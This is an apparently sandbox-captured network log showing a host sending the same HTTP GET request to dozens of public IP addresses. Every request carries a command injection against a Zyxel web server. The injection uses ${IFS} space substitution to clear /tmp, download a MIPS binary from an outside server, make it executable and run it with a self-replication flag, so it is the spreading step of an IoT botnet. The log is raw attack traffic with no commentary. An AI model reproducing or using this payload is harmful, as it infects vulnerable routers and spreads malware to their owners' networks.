                                        Jan 14, 2024 16:18:58.787671089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8290192.168.2.1351548118.93.71.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.787735939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8291192.168.2.13568869.190.244.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.787791014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8292192.168.2.134107670.7.54.185443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.787827015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8293192.168.2.1357588187.136.35.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.787878990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8294192.168.2.1341938143.92.95.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.787971020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8295192.168.2.133968494.185.226.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.788018942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8296192.168.2.134384440.135.59.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.788058996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8297192.168.2.135870463.238.248.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.788113117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8298192.168.2.1350060140.122.13.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.788158894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8299192.168.2.1335398131.63.247.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.788223982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8300192.168.2.134571012.93.47.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.788270950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8301192.168.2.1346804170.117.191.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.788350105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8302192.168.2.133550678.26.70.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.788407087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8303192.168.2.1335500184.89.0.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.788444042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8304192.168.2.1334262171.240.188.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.788521051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8305192.168.2.134374285.95.155.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.788568020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8306192.168.2.135096458.138.182.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.788646936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8307192.168.2.135908412.221.169.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.788711071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8308192.168.2.1353678121.159.53.185443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.788780928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8309192.168.2.1346820113.78.9.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.788868904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8310192.168.2.1353052163.86.152.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.788892031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8311192.168.2.1347994172.4.176.26443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.788950920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8312192.168.2.134047814.235.86.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.788985014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8313192.168.2.134300237.87.52.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.789063931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8314192.168.2.1346028132.110.156.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.789159060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8315192.168.2.1334708115.245.218.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.789181948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8316192.168.2.1340218148.139.187.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.789236069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8317192.168.2.1343648117.61.132.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.789295912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8318192.168.2.1360518192.121.213.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.789354086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8319192.168.2.1333720212.8.60.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.789388895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8320192.168.2.135602217.135.5.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.789438009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8321192.168.2.1346676147.189.84.202443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.789501905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8322192.168.2.1333872149.65.179.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.789572954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8323192.168.2.1360852129.97.219.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.789627075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8324192.168.2.1334492131.89.81.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.789669991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8325192.168.2.133287689.194.217.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.789725065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8326192.168.2.135830448.244.204.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.789808035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8327192.168.2.1359494170.214.160.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.789836884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8328192.168.2.1345150110.31.210.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.789891958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8329192.168.2.134381682.161.96.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.789937973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8330192.168.2.1360880191.76.203.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.790007114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8331192.168.2.133949666.136.226.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.790055990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8332192.168.2.1357268102.252.85.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.790119886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8333192.168.2.1357640171.11.169.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.790160894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8334192.168.2.1339758134.128.9.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.790201902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8335192.168.2.1346266101.149.216.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.790251970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8336192.168.2.1352162202.15.191.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.790321112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8337192.168.2.1355308217.89.100.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.790378094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8338192.168.2.1341048108.51.101.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.790425062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8339192.168.2.1336542107.139.46.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.790492058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8340192.168.2.1351356212.148.255.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.790544987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8341192.168.2.1345360200.120.154.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.790618896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8342192.168.2.1343894208.218.216.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.790668011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8343192.168.2.135246687.83.18.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.790725946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8344192.168.2.134674095.183.65.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.790800095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8345192.168.2.1354656196.172.235.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.790841103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8346192.168.2.1357764142.128.98.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.790896893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8347192.168.2.1360640166.20.237.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.790956974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8348192.168.2.1335286134.84.37.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.791023016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8349192.168.2.1334316200.115.243.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.791102886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8350192.168.2.1360752168.192.51.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.791162968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8351192.168.2.1354124186.195.237.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.791240931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8352192.168.2.1340844165.126.229.34443
                                        TimestampBytes transferredDirectionData
